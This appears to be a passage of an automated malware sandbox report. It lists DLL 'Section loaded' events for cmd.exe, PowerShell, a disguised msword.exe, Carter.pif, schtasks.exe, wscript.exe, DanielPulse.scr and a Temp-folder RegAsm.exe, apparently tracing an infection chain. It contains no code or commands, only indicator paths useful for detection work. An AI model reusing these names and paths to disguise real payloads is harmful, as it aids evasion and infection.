Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: userenv.dll
